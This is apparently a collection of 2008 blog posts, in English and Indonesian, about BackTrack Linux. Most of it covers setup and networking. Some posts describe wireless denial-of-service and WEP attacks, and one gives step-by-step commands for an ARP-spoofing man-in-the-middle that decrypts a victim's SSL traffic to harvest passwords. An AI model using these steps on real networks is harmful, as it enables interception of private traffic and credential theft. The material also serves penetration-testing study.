Readers often ask me how they can quickly get up to speed on hacking or defending against hackers. My answer is always the same: Subscribe to multiple computer security distribution lists, read as much as you can, and learn how to (legally) hack. BackTrack is the quickest way to get access to hundreds of tools, if the Linux part doesn't scare you. For non-Linux users, this distribution is about as Windows-friendly as you can get. Most users can get up and running using BackTrack with little or no Linux knowledge. The KDE graphical user interface makes most tools and programs usable with a few mouse clicks. For instance, setting up Snort is a one-click process (try that outside of BackTrack).

BackTrack also does a decent job for wireless and password hacking. Although there's a long list of include tools, here are my personal favorites:

Metasploit (vulnerability tester)
Snort (intrusion detection/prevention)
Hping (packet shaper)
Nmap (fe gui included)
Xprobe2 (OS identifier)
Cisco Auditing Tool
Curl
Httprint (and GUI)
Lynx (bare-bones browser)
Nikto (awesome free Web site vulnerability scanner)
SQL Scanner
Milw0rm archive
Dsniff
Ettercap
Hydra (password guesser)
John the Ripper
Wireshark (packet sniffer/analyzer)
Kismet
Airsnort
Bluesnarfer
SIPCrack
OllyDBG

Not only does BackTrack have an excellent collection of tools, the designers of the CD have tried to align BackTrack with common penetration-testing guideline frameworks, including the Open Source Security Testing Methodology Manual and Information Systems Security Assessment Framework, which can only help any budding pen tester.

You can download several different types of images, including a 784MB USB/DVD image, a stripped-down 695MB ISO, and a 689MB VMware image.

Lest I get any angry readers taking me to task for "teaching malicious hacking," these tools are for the good guys. Bad hackers are already doing just fine without the supereasy toolkits. Overall, we need more defenders learning more, and tools like BackTrack help in that regard.

Installasi Program di Backtrack [ Part I ]

2008-11-27T06:33:00.000-08:00

Setelah menginstall distro Backtrack di linuxbox yang saya gunakan, rasanya kurang menarik bila tidak menambahkan beberapa tools yang membantu saya dalam kegiatan tulis-menulis seperti saat menulis artikel ini, saya menggunakan applikasi Bluefish versi 1.0.7. Selain applikasi untuk perkantoran, saya juga menanamkan beberapa applikasi seperti :

Openoffice 2.2.1
Abiword 2.4
The Gimp 2.2.17
Virtualbox 1.5.2
Cedega 5.1
Bluefish 1.0.7
Kaffeine 0.8.1
XMMS 1.2.10
Xine-ui 0.99.5

Applikasi tersebut sudah saya coba dan berjalan tanpa hambatan, untuk menambah applikasi pada Backtrack, kita hanya memerlukan konverter module yang sama dengan distro Slax, ya karena Backtrack berbasis Slax, maka Anda dapat menggunakan tools untuk merubah file berektensi *.tgz, *.mo, *.rpm ke *.lzm, disini saya menggunakan tools seperti mo2lzm, rpm2lzm, tgz2lzm dan lzm2dir yang semua’a dapat di peroleh dari situs Slax.

Apabila tools tersebut sudah tertanam di Backtrack Anda, maka command yang dapat Anda jalankan seperti berikut :

bt ~ # mkdir /root/slax_modules/applikasi/chkrootkit-0.46a-6
bt ~ # mo2lzm chkrootkit_0_46a-6.mo chkrootkit_0_46a-6.lzm
bt ~ # lzm2dir chkrootkit_0_46a-6.mo.lzm /root/slax_modules/applikasi/chkrootkit-0.46a-6

Selanjutnya Anda hanya tinggal meng-copy paste file yang sudah di ekstrak saja

Referensi:
http://slax.hosting4p.com
http://slax.hosting4p.com/modules.php

Compiling and Installing The Latest Xorg 7.2

2008-11-27T06:32:00.000-08:00

If that’s not enough for you, this guide will take you through the steps of installing the latest Xorg 7.2 server. I needed to do this as well to get my new 965GM chipset working.

Uninstall you’re old version of xorg (removepkg) packages are located in /var/log/packages
Download the new packages. I got my packages from the pinki1 build. Don’t download the auto script it will not work for you, trust me.
I downloaded them all to /var/log/packages then installed them (installpkg)
Add:

/usr/X11R7/lib to /etc/ld.so.conf

Add /usr/X11R7/bin to the PATH variable
Note: you can also edit /etc/profile and find the lan that says:

PATH="/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/usr/local/apache/bin:/usr$

And change X11R6 to X11R7

Now is the time to install any graphic drivers if you happen to be using the lintel drivers you can find the install directions from: http://intellinuxgraphics.org/install.html and the actual drivers from xorg.freedesktop.org
Change all the fontpaths in /etc/X11/xorg.conf from

/X11R6 to /X11R7

Change your fontpaths in /etc/fonts/fonts.conf:

/usr/X11R6/lib/X11/fonts/TTF

might be changed to

/usr/X11R7/lib/X11/fonts/TTF

Install these packages:

ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/Library/libpthread-stubs/libpthread-stubs-0.1-i486-1ced.tgz
ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/libxcb/libxcb-1.0-i486-1ced.tgz
ftp://ftp.scarlet.be/pub/linuxpackages/Slackware-11.0/X11/xcb-proto/xcb-proto

Note: Change xcb-proto to xcb-proto.tgz so you can install it:

# mv xcb-proto xcb-proto.tgz

Run /usr/X11R6/bin/fc-cache -f from root and user if you have another account.
Congratulations you’re now running xorg 7.2

Author :
remote-exploits.blogspot.com

Ditulis dalam Modding. 1 Komentar »

Compiling ALSA

Desember 25, 2007 — Rot-13

“ALSA (an acronym for Advanced Linux Sound Architecture) is a Linux kernel module that replaces several different kernel drivers for sound cards with a single device driver which handles the diversity of sound cards internally. Some of the goals of the ALSA project were to support automatic configuration of sound card hardware, and graceful handling of multiple sound devices in a system, goals which it has largely met.

Unpack the source:

# bunzip2 alsa-driver* && tar -xvf alsa-driver*

Change to the new directory:

# cd alsa*

Configure and compilation alsa:

# ./configure && make

Begin install:

# make install

If your card is supported(http://www.alsa-project.org/alsa-doc/), run ‘alsaconf’ and follow the directions:

# alsaconf

Then, to configure sound and mixer options:

# alsamixer

Author :
remote-exploits.blogspot.com

Koneksi ke OPEN/WEP WLAN ( DHCP )

2008-11-27T06:31:00.002-08:00

Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP (DHCP).

# iwconfig [interface]  mode managed key [WEP key]

Note :

Gantilah kata “interface” dengan nama interface Anda yang lagi aktif saat ini, misal ath0, wlan0 atau eth1.
WEP key, masukkanlah kata kuci WEP, 10 karakter hexadecimal untuk 64 bit dan 26 karakter untuk 128 bit.

# iwconfig essid  "[ESSID]"

ESSIS = Spesifikasi SSID dari suatu WLAN

# dhclient [interface]

Untuk mendapatkan IP address, netmask, DNS server dan default gateway dari akses poin.

Koneksi ke OPEN/WEP WLAN ( Setup IP Manual )

2008-11-27T06:31:00.001-08:00

Untuk menghubungkan ke wireless LAN yang Open atau Secured by WEP ( IP Manual/Statis ).

# iwconfig [interface]  mode managed key [WEP key]
# ifconfig [interface] [IP address] netmask [subnetmask]
# iwconfig essid  "[ESSID]"
# route add default gw [IP of default gateway]

Note :

Masukkan IP Address gatewaynya ( biasanya alamat IP dari Access Point )

# echo nameserver [IP address of DNS server]  >> /etc/resolv.conf

Konfigurasikan DNS server Anda.

# ping www.detik.com

Melakukan uji koneksi.

Kumpulan Perintah iwconfig

2008-11-27T06:30:00.001-08:00

# iwconfig [interface] mode master

Menjadikan kartu PCMCIA dalam mode akses poin

# iwconfig [interface] mode managed

Menjadikan kartu PCMCIA Anda dalam mode client pada jaringan wifi infrastruktur

# iwconfig [interface] mode  ad-hoc

Mengeset kartu Anda sebagai anggota di jaringan wifi ad hoc tanpa akses poin

# iwconfig  [interface] mode monitor

Mengeset kartu Anda dalam mode monitor

# iwconfig [interface]  essid “SSID_Anda”

Konfigurasikan ESSID jaringan Anda.

# iwconfig [interface] key 1111-1111-1111-1111

Mengeset kunci WEP 128bit

# iwconfig [interface] key 11111111

Mengeset kunci WEP 65 bit

# iwconfig [interface] key off

Menonaktifkan kunci WEP

# iwconfig  [interface] key open

Menset sebagai open mode, tidak diperlukan autentikasi

# iwconfig [interface] channel [channel no.]

Menset sebuah channel 1-14

# iwconfig  [interface] channel auto

Memilih channel otomatis

# iwconfig  [interface] freq 2.422G

Menset channel dalam Ghz

# iwconfig [interface]  ap 11:11:11:11:11:11

Memaksa kartu untuk mendaftar ke alamat AP

# iwconfig [interface] rate 11M

Kartu akan menggunakan kecepatan tertentu

# iwconfig [interface] rate auto

Memilih kecepatan otomatis

# iwconfig [interface] rate auto 5.5M

Kartu akan menggunakan kecepatan tertentu dan kecepatan di bawahnya jika memang diperlukan

Gateway Backtrack2

2008-11-27T06:29:00.002-08:00

Langsung saja, tutorial ini untuk melengkapi postingan bang alie dengan judul “Router Backtrack”-nya. Untuk membuat Gateway menggunakan distro Linux Backtrack langkah pertama adalah tentunya sudah terinstall Backtrack di komputer yang akan dijadikan sebagai Gateway, disini saya menggunakan Backtrack2 sebagai tempat percobaannya…eth0 terhubung langsung ke internet dengan keterangan sbb :

IP Address : 203.81.xxx.xx5
Netmask : 255.255.255.0
Gateway : 203.81.xxx.xx1
Nameserver :
203.81.xx4.11
203.81.xx5.12

eth1 terhubung ke klien di jaringan, dengan keterangan sbb :

IP Address : 192.168.0.1
Netmask : 255.255.255.0

Setelah sempat bingung mengutak-atik agar settingan jaringan dapat berjalan d saat startup mulai dari gui, mengetikkan command netconfig di konsole, bahkan file /etc/rc.d/rc.inet1.conf pun sudah saya utak-atik, tetap saja hasilnya nihil ( lantaran masih newbie se… ), untuk mengaktifkan NAT (Network Address Translation) biasanya ( di slackware ) kita mengisi beberapa baris perintah iptable di /etc/rc.d/rc.local, namun disini saya tidak melakukannya, sebagai alternatif… maka saya mencoba mengganti isi file /etc/rc.d/rc.inet1 yang akan diisi dengan beberapa baris perintah untuk setting network sekaligus iptablenya ( tentunya perintah iptable sederhana ), berikut langkah yang saya lakukan :

# chmod +x /etc/rc.d/rc.ip_forward
# echo “1″>/proc/sys/net/ipv4/ip_forward

Perintah tsb untuk mengaktifkan opsi bahwa Linuxbox tsb akan difungsikan sebagai router.

Masukkan NameServer pada file /etc/resolv.conf

# echo “nameserver 203.81.xx4.11″>/etc/resolv.conf
# echo “nameserver 203.81.xx5.12″>>/etc/resolv.conf
# cat /etc/resolv.conf
nameserver 203.81.xx4.11
nameserver 203.81.xx5.12

Sebelumnya saya melakukan backup file defaultnya terlebih dahulu…

# mv /etc/rc.d/rc.inet1 /etc/rc.d/rc.inet1.old
# nano /etc/rc.d/rc.inet1

Isinya sebagai berikut ( sesuaikan dengan keterangan diatas ) :

# rc.inet1 This shell script boots up the base INET system.
#
# Version: @(#)/etc/rc.d/rc.inet1 1.01 05/27/93
# Modified by atoz [at] debian-id [dot] org

# Attach the loopback device.
/sbin/ifconfig lo 127.0.0.1
/sbin/route add -net 127.0.0.0 netmask 255.0.0.0 lo

# Auto eth0.
IPADDR[0]=”” # REPLACE with YOUR IP address!
NETMASK[0]=”” # REPLACE with YOUR netmask!
NETWORK[0]=”” # REPLACE with YOUR network address!
BROADCAST[0]=”” # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

GATEWAY=”” # REPLACE with YOUR gateway address!

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth0 ${IPADDR[0]} broadcast ${BROADCAST[0]} netmask ${NETMASK[0]}

# Uncomment this to set up your gateway route:
/sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1

# Auto eth1.
IPADDR[1]=”” # REPLACE with YOUR IP address!
NETMASK[1]=”” # REPLACE with YOUR netmask!
NETWORK[1]=”” # REPLACE with YOUR network address!
BROADCAST[1]=”” # REPLACE with YOUR broadcast address, if you
# have one. If not, leave blank and edit below.

# Uncomment the line below to initialize the ethernet device.
/sbin/ifconfig eth1 ${IPADDR[1]} broadcast ${BROADCAST[1]} netmask ${NETMASK[1]}

# Network Address Translation ( NAT ).
iptables -A FORWARD -o eth0 -i ! eth1 -j ACCEPT
iptables -A FORWARD -m state –state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -f -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# End of rc.inet1

Anda dapat mencoba melakukan shutdown Linuxbox yang Anda gunakan dan menikmati hasilnya

Manajemen User di Backtrack

2008-11-27T06:29:00.001-08:00

Backtrack merupakan turunan dari distro Slax, dan bisa di katakan sebagai cucunya dari distro Slackware, bagi yang sudah pernah atau familiar dengan distro tua ini ( Slackware.Red ), tentunya tidak perlu terlalu lama untuk melakukan pembuatan user, jadi tutorial ini di tujukan untuk para newbie linux seperti saya p
Tutorial ini juga saya publish di blog BacktrackIndo.

Misalnya kita membuat user baru bernama anonymous. berikut langkah-langkahnya :

Periksa terlebih dahulu Anda sekarang login sebagai apa? tentu saja sebagai root ))
lha… user lainkan belum dibikin ne… ( AtoZ edan !!!… )) )

# whoami
root

Sebelum melanjutkan ke tahap pembuatan user, saya akan membuat folder public_html terlebih dulu
di direktori /etc/skel agar setelah selesai membuat user, secara automatis folder public_html
juga akan dibuat pada home direktori user tersebut ( /home/anonymous/public_html ) :

# mkdir /etc/skel/public_html

Sekarang kita memasuki tahap pembuatan user :

# adduser anonymous

Login name for new user: anonymous

User ID (’UID’) [ defaults to next available ]:

Initial group [ users ]:

Additional groups (comma separated) []:

Home directory [ /home/anonymous ]

Shell [ /bin/bash ]

Expiry date (YYYY-MM-DD) []:

New account will be created as follows:

—————————————
Login name…….: anonymous
UID…………..: [ Next available ]
Initial group….: users
Additional groups: [ None ]
Home directory…: /home/anonymous
Shell…………: /bin/bash
Expiry date……: [ Never ]

This is it… if you want to bail out, hit Control-C. Otherwise, press
ENTER to go ahead and make the account.

Creating new account…

Changing the user information for anonymous
Enter the new value, or press ENTER for the default
Full Name []: anonymous
Room Number []:
Work Phone []:
Home Phone []:
Other []: atoz@bungker.org
Changing password for anonymous
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Account setup complete.

Note :
Masukkan nama user, no id useeer, nama kecil atau inisialisasi, home direktori, shell yang digunakan,
tanggal kadaluarssa hasil account yang dibuat.

Untuk menghapus user, jalankan perntah :

# userdel anonymous

Setiap user memilik group masing-masing, berguna bila bekerja dalam sebuah jaringan. Semua user yang berada dalam group yang sama memiliki hak akses yang sama pula, nah… untuk menambah group. gunakan perintah :

# groupadd [nama_group]

Untuk menghapusnya, gunakan perintah :

# groupdel [nama_group]

Apabila Anda ingin memodifikasi akun user yang Anda punya, gunakan perntah usermod. Misalnya Anda ingin memodifikasi
group user anonymous, menjadi group wheel.

# usermod -G wheel anonymous
# id anonymous
uid=1001(anonymous) gid=100(users) groups=100(users),10(wheel)

Untuk melihat manual penggunaan perintah yang telash disebutkan di atas, gunakan perintah man [nama_perintah]. Contoh :

# man usermod

Sampai disini dulu pembahasan kita. Selamat mencoba )

BackTrack

2008-11-27T06:25:00.000-08:00

ALL ABOUT BACK|TRACK
remote-exploit
wiki backtrack
forum remote-exploit
offensive security
INDONESIAN BACKTRACK
backtrack newbie
indonesian backtrack community
collecting about backtrack pentest
yogyafree backtrack
yogyafree backtrack
bungker.org
dadang haryadi backtrack
http://download.cyber-isp.net/linux/Backtrack/ download BT1
http://yum.jardiknas.org/backtrack/ download BT2
http://ftp.fisika.ui.ac.id/pub/linux/iso-cd/backtrack/ download BT2
http://repo.ugm.ac.id/iso/backtrack/ download BT2&3
echo backtrack
ALL ABOUT SLACKWARE

Bagaimana Menggunakan Linux Backtrack

Ok,banyak yang bertanya2 cara menggunakan linux backtrack.
Disini saya akan mengulas "sedikit" tentang cara menggunakan linux backtrack.
Download dulu linuxnya yang berbentuk livecd download backtrack2
Lalu burn menjadi livecd "caranya"
Booting komputer via cd (jgn lupa setting dibios boot first cd)
=============================================================

-------------------------------------------------------
:: Backtrack 2.0 ::
BackTrack
login: root
password: toor
--------------------------------------------------------
*** When finished, hit Ctrl+Alt+Delete and
wait until the computer reboots ***
--------------------------------------------------------
slax login:_
=============================================================
Lalu login masukkan login:root dan password:toor
Setelah itu Ketikkan xconf
=============================================================
Trying to autoconfigure Xwindow system, please wait...
creating /etc/X11/xorg.conf...
all done. Run startx now.
=============================================================
Atau langsung ketik startx
atau lo bisa ketik guifast
ok sekarang lo dah masuk ke linux backtracknya.

Biasanya backtrack akan men set network secara dhcp tapi kalau ngga caranya gini:
setting IP secara Dhcp.
caranya:
ketik "dhcpd eth0"
(untuk eth0 ini tergantung dari lan card yang lo gunain)
untuk memastikan ketik ifconfig

setting IP secara static.
caranya:
ketik "ifconfig eth0 192.168.1.2/24" ->setting IP dan subnet
ketik "route add default gw 192.168.1.1" -> setting gateway
ketik "echo nameserver 192.168.1.1 > /etc/resolve.conf" -> sett dns
untuk memastikan ketik ifconfig

Jangan lupa untuk ganti passwordnya
caranya:
ketik "passwd" masukkan pasword yang "kuat"

untuk memunculkan bash command bisa ketikkan:
leetmode atau yakuake

cara menginstal backtrack ke harddisk beserta pilihan dual boot:
jalanin "Qtparted" dari linux tsb dari bash command
nanti didalem qtparted tsb terdapat partisi (kayak fdisk di win)
ex: 4Giga
partisi pertama 3.5Giga
partisi Kedua 0.5Giga
yang partisi pertama di format ext3
yang partisi kedua di format linux-swap
(disini qtparted suka ngaco lo buka shell umount ato mount hda1 dan hda2)
hal ini supaya qtparted bisa di create ato format setelah itu jangan lupa commit di toolbarnya
setelah itu buka "backtrack installer" pilih "install backtrack to hda2" hal ini tergantung hdd lo
klo sata biasanya namanya sda klo ide biasanya namanya hda (hda1 buat windows and hda2 buat linux ext3) tunggu sampai 100% setelah itu restart and boot ke linux automatically
dari linux lo buka shell masuk ke folder /etc ketik "nano lilo.conf" trus di lilo tsb tambah ini diatas image
==============================
other = /dev/hda1
label = Windows
table = /dev/hda
==============================
jadi nya klo gw kayak gini
==============================
boot = /dev/hda
prompt
timeout =1200
bitmap=/boot/splash.bmp
change-rules
reset
vga = 0x317
other = /dev/hda1
label = Windows_Xp
table = /dev/hda
image = /boot/vmlinuz
root = current
initrd = /boot/splash.initrd
label = Backtrack_2
read-only
========================
dah sekarang restart lo bisa liat di waktu pertama boot di minta milih mau w1nd0ws apa linux

Sekarang merubah tampilan pertama backtrack :
caranya:
ketik ini di shell alias command promptnya klo di wnd0ws
bt ~ # nano /etc/issue
dah deh tinggal kreasiin sendiri

ngerubah command line logon menjadi otomatis saat kde start:
bt ~ #nano/etc/inittab
rubah id:3:initdefault: menjadi id:4:initdefault:

membuat leetmode start otomatis
ketik:
cd /root/.kde/Autostart
ln -s /usr/bin/leetmode leetmode
hal ini membuat link leetmode di outostart

membuat yakuake start otomatis
ketik:
cd /root/.kde/Autostart
ln -s /opt/kde/bin/yakuake yakuake
sekarang di KDE hanya tinggal tekan F12

Script dibawah yang membuat otomatis cd-rom keluar:
ketik:
cd /etc/rc.d
ketik:
nano rc.6
cari code yang seperti ini:
# eject cdrom devices
. ./usr/lib/liblinuxlive
#echo "Ejecting all CDROMs..."
#list_cdrom_devices while read DEVICE; do
# cdrecord dev=$DEVICE -eject >/dev/null 2>/dev/null
# can't use eject because it's not working with our kernel
# eject -s $DEVICE >/dev/null 2>/dev/null
#done
#echo "========================================"
#echo "It's safe to switch the computer off now"
#echo -ne "Press Enter to $command "
#read junk

cara merubah pesan pertama kali boot:
nano /etc/issue

cara menginstal java client:
INSTALL JAVA CLIENT
http://java.com/en/download/manual.jsp
- Download Java Linux (self-extracting file)
- cd opt
- mkdir java
- cp /tmp/jre-6u1-linux-i586.bin /opt/java
- cd java
- ls
- chmod a+x jre-6u1-linux-i586.bin
- ls -l
- ./jre-6u1-linux-i586.bin
- yes
- ls
http://java.com/en/download/help/5000010500.xml#enable
- cd /opt/firefox/plugins
- ln -s /opt/java/jre1.6.0_01/plugin/i386/ns7/libjavaplugin_oji.so
- Firefox-Preferences-Content-Enable java
Good luck.

secure shell daemon
caranya:
ketik "sshd-generate"
ketik "/usr/sbin/sshd"
ketik "netstat -ant grep 22"

Bikin http server klo bahasa neubenya bikin web server
caranya:
ketik "apachectl start" ->fungsinya hidupin apache server buat web
ketik "netstat -ant grep 80" ->cek apakah port 80 aktif
ketik "apachectl stop" ->fungsinya matiin apache server
ketik "netstat -ant grep 80" ->cek lagi

bikin file tansfer protocol atau kerennya ftp server
caranya:
ketik "atftpd --daemon --port 69 /tmp/"
ketik "netstat -anu grep 69"

bikin vnc server biasanya dipake buat ngeremote
caranya:
ketik "vncserver"
masukkan 8digit pass ato lebih
ketik "netstat -ant grep 5901"

caranya bikin dual boot secara otomatis (dikonfigurasi sendiri sama linuxnya)
tinggal ketik "liloconfig" tinggal ikutin perintahnya aja

konfigurasi IP memakai netconfig
di shell tinggal ketik "netconfig" aja

buat tanem ip
masuk k etc ubah file rc.inet1 "nano /etc/rc.d/rc.inet1.conf"
rubah:
# Config information for eth0:
IPADDR[0]="xxx.xxx.xxx.xxx"
NETMASK[0]="255.255.255.xxx"
USE_DHCP[0]=""
DHCP_HOSTNAME[0]=""
# Default gateway IP address:
GATEWAY="xxx.xxx.xxx.xx"
jangan lupa ketik
bt rc.d # rc.inet1

bikin techmon kayak leetmode di BT3
caranya di sheel ketik "superkaramba" trus download filenya jadi degh di desktop

cara install paket yang berextention .tgz
tinggal ketik:
"installpkg namapaket.tgz"

mengextrax file .gz
"tar -xzvf namafile.gz"
$ tar -zxvf nama_file.tar.gz -C /folder/tujuan/

mengextrax file .bz2
"tar -xjvf namafile.bz2"

bagaimana mengupdate slackware yang ada di backtrack pake slapt-get:
ketik ini di shell "slapt-get --update" setelah itu ketik "slapt-get --upgrade"
ketik 'kwrite /etc/slapt-get/slapt-getrc"
tambahin:
SOURCE=http://darkstar.ist.utl.pt/slackware/
buat download updatean nya
program yang lain yaitu:
Kslackcheck buat update slack juga
ini downloadnya kslackcheck
cara installnya tinggal "installpkg namafile.tgz" selesai lihat di system
nambah fast-track di BT2
caranya download dulu fast-track nya
lalu masukkan ke directory "/pentest/misc/"
setelah itu ketik "chmod 755 fast-track.py"

konfigurasi sound dibacktrack
tinggal ketik "alsaconf" ikutin perintahnya setelah selesai ketik "alsamixer" setelah setting suara ketik "alsactl store" buat nyimpen

ini hal aneh kok pentest ada officenya
yahhh gpp degh namanya juga belajar
pertama download officenya di open office
ekstrax "tar -xzvf OOo_2.3.1_LinuxIntel_install_en-US.tar.gz"
masuk ke folder "cd OOG680_m9_native_packed-1_en-US.9238"
masuk ke folder "cd RPMS"
ketik ini "rpm2tgz *.rpm"
install "installpkg *.tgz"
masuk ke diretory "cd /opt/openoffice.org2.3/program/"
jalanin program "soffice"
bikin di menu kde
bikin di menu start kde
klik kde start klk kanan pilih "edit menu"
pilih editor trus klik kanan pilih new item
name : office
command : '/opt/openoffice.org2.3/program/soffice' #pake tanda ' nya yah
work path : /opt/openoffice.org2.3/program
finish
gretzz to irfahmi
finish

mau milih window manager ketik ini "xwmconfig"

cara buat ngebaca ntfs yaitu pake ntfs-3g
sebelumnya umount dulu partisi yang mau di ntfs
"umount /dev/hda"
"ntfs-3g /dev/hda /mnt/hda? -o force"

cara nginstall Xvidcap buat bikin video tutorial
donwload
trus "installpkg namafile"

install kmail client
download kmailnya
"tar -xjvf kdepim-3.5.6.tar.bz2"
"configure && make && make install"

install thunderbird
download thunderbirdnya
ekstrax "tar -zxvf thunderbird-2.0.0.12.tar.gz"
buat linknya di kde menu editor linknya Thunderbird
atau "double klik thunderbird"

temen g ada yang nanya cara ngerubah password gimana
ketik aja "passwd" ketik password yang panjang
supaya ngga di konfirmasi sama linux lo

mengaktifkan ssh pada backtrack pertama kali
"setup-sshd" untuk start atau memulainya "start-sshd"
untuk stop "stop-sshd"

untuk mengaktifkan firewall di backtrack secara otomatis
bt / # cat >> /etc/rc.d/rc.local
. /etc/rc.d/rc.FireWall start
^d
bt / #
gretzz willy master slackware

Apasih kernel itu (bisa lihat disini)
Apasih perbedaan kernel SMP sama kernel biasa (bisa lihat disini)

=========================================
Install BT3 ke hdd
=========================================
Gw ngga Jelasin bagaimana caranya
membuat partisi di hdd
Siapin partisi hdd contoh:
sda1=backtrack
sda2=swap
——————————
bt~#mkdir /mnt/backtrack
bt~#mount /dev/sda3 /mnt/backtrack/
bt~#mkdir /mnt/backtrack/boot/
bt~#mount /dev/sda1 /mnt/backtrack/boot/
bt~#cp –preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/
bt~#mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
bt~#mount –bind /dev/ /mnt/backtrack/dev/
bt~#mount -t proc proc /mnt/backtrack/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack/boot/
—————————–
buat lilonya.
bt~#chroot /mnt/backtrack/ /bin/bash
bt~#nano /etc/lilo.conf
—————————–
# Isi dari Lilo.conf
lba32
boot = /dev/sda
prompt
timeout=60
change-rules
reset
vga=791 #tergantung display lo liat aja yang sudah ada
image = /boot/vmlinuz
root = /dev/sda3
label = Backtrack3_final
#selesai
bt~#lilo -v
bt/~#exit
—————————-
trus reboot komputernya

semuanya diketik tanpa memakai " "

Mdk3 Secret Destruction Mode

2008-11-24T06:59:00.001-08:00

It's a combination of different attacks.
Cisco still has a bunch of support tickets running.
Their Intrusion Detection System crashed because of this special attack.
And with the IDS the routing tables at the whole university got mixed up for
about half an hour.

So, TRY THIS AT HOME, but not anywhere else.

The combination is:
- Running beacon flood mode to generate fake APs with the same name as your
victim
- Auth-DoS the original AP with intelligent mode
- Use the amok mode to kick the clients
And for the next version of mdk3
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to
real and fake APs making all security systems go FUBAR.

In this 802.11-hell, there should be nobody able to access the network.
Because:
-> They get kicked when they connect (Amok mode)
-> They will see thousands of APs, unable to know which is the one to connect,
thus they are just trying around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the
Auth-DoS

Fake Shared Key Authentication
This is world's first fully functional code to enable fake authentication on networks using Shared Key Authentication. You do NOT need to know the key to authenticate, all you need is a keystream that has been chopped with aireplay-ng's chopchop attack. Hirte, another developer from the aircrack-ng community successfully included this code into the aircrack suite.
Fixed in Version 0.2:
- Show error when network does not use Shared Key Authentication
- Get Capability Field from Beacon Frame. (Using the standard capabilities failed for some APs)

ska-0.2.tar.bz2
ska-0.1.tar.bz2

Fragmentation Attack
And another world premiere from me. First implementation of the Fragmentation Attack on Linux. This attack needs a special driver and card, that is able to handle the IEEE802.11 fragmentation correctly, your driver may not work or may need to be updated/modified. The output of this tool is a file in the aircrack-ng keystream format (.xor). The output can be used in the same way like the output of the chopchop attack in aireplay-ng. With that keystream you can build an ARP packet (arpforge-ng or for the 0.6.2 release packetforge-ng). This packet can then be injected into the target wifi system, generating either answers and/or replies increasing the IV count. For an example attack, see the README in the tarball. afrag has already been integrated into aireplay-ng, best idea is to get the aircrack-ng SVN version for the newest fragmentation attack code.

afrag-0.1.tar.bz2

Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.

2008-11-24T06:57:00.000-08:00

Before reading on this guide is for educational purposes only. I take no responsibility from what people do with this info.

First thing is to get fragrouter. I don't know if you can use other tools provided with the backtrack, there are 100 ways to skin a cat and this is just my way.

http://packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html

There are lots of things that you can do with fragrouter but we are going to use fragrouter to setup IP forwarding.

We do this with this command :

Code:
fragrouter -B1Squash that window and put it to one side. Now open another shell and we will start dnsspoof with this command

Code:
dnsspoof -i ath0 (or whatever network interface you are using)Again put that window to one side and lets load up webmitm. Webmitm will issue our ssl cert to the victim so we can decrypt the traffic we capture.

Start webmitm by typing

Code:
webmitm -dNow we can start the arp spoof. To start ettercap type

Code:
ettercap -T -M arp:remote /router addy/ /victim addy/Ok now we are rolling next thing is to sniff the traffic. There are a few things you can do know like using ettercap filters and adding urls from metasploit, (Maybe next tut ) and lots of other things. But we are intrested in the ssl traffic so I use wireshark to save the data into a .cap file.

You can find wireshark in Backtrack >>> Privilege Escalation >>> Sniffers.

Now we have loaded wireshark lets start capturing packets. Go to Capture >>> Options and setup what network card you are using and then hit start.

Ok you should now be capturing packets addressed to your victims addy. Once you have captured enough, stop wireshark and save the data to your root directory.

Now to decrypt the SSL data.

You should first download ssldump:

http://www.rtfm.com/ssldump/

ssldump is going to decrypt our sniffed ssl data using our fake ssl cert we issued to the victim. We do this by opening up a shell and typing:

Code:
ssldump -r your.cap -w webmitm.crt -d > outAnd you are done, all the ssl data will be saved to a file called out in your root dir. Use what you like to search it for passwords etc.
by Dr_GrEeN

ssldump

2008-11-24T06:56:00.000-08:00

ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.

ssldump 0.9b3
The current version is 0.9b3

ssldump 0.9b3 contains a number of fixes and enhancements over 0.9b2, including.

Security fix: some potential over and underflows
Added support for VLANs.
Added -P flag to disable promiscuous mode. Fixed bugs in the TCP reassembly code.
A lot of bug fixes.

Nokia Energy Profiler 1.1

2008-11-24T06:55:00.000-08:00

Nokia Energy Profiler is a stand-alone test and measurement application for S60 3rd Edition, Feature Pack 1 devices (and onwards). The application allows developers to test and monitor their application’s energy usage in real time in the target device.

The application is available as a SIS package for S60 3rd Edition devices, but measurement works only in S60 3rd Edition, Feature Pack 1 (or newer). Older devices can still view files.

This view shows the cellular signal levels as RX and TX levels. RX level corresponds to the power of the received cellular signal. TX level refers to the transmission power from the cellular radio. Both measures are in dBm. TX levels show up only during active transmission periods (voice or data). RX levels are available whenever connected to a cellular network. This means there is no RX level in the Offline phone profile. Average/instant bar values are for the selected signal that is shown in the corner indicator. You can toggle the chosen signal with the [6] key. Unlike all the other views, the zero y-axis is in the bottom of the screen. RX levels are typically between -30 to -120 dBm (a lower value means poorer signal), whereas TX levels are positive dBm (a higher value means more power).

FTD FieldTest NetMonitor S60v3 SymbianOS9.1/9.2

2008-11-24T06:52:00.000-08:00

Description:

FTD is netmonitoring mobile network application mobile devices.

Full GSM signaling which can be visible to network operator:
Information on the serving cell:
- Hoping, Channel carrier number, RX level, TX power levels, Rx quality, Time Slot, Timing advance, Radio Link Timeout, C1, C2, Currently used band, Type of current channel...
